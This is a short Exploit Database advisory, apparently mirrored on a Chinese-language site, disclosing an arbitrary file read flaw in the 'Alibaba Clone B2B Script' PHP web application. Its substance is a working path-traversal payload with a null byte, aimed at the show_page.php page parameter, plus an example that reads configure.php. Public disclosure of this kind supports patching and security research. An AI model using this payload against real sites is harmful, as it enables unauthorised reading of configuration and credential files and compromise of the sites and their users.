Alibaba Clone B2B Script – Arbitrary File Disclosure

• Exploit Database
• 17 阅读

• 作者： Meisam Monsef
  日期： 2016-06-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40006/

• # Exploit Title: Alibaba Clone B2B Script File Read Vulnerability
  # Date: 2016-06-22
  # Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
  # Vendor Homepage: http://alibaba-clone.com/
  # Version: All Versions
  # Tested on: CentOS and Windows
  
  Exploit :
  http://site/show_page.php?page=../[FilePath]%00
  
  Example :
  http://site/show_page.php?page=../configure.php%00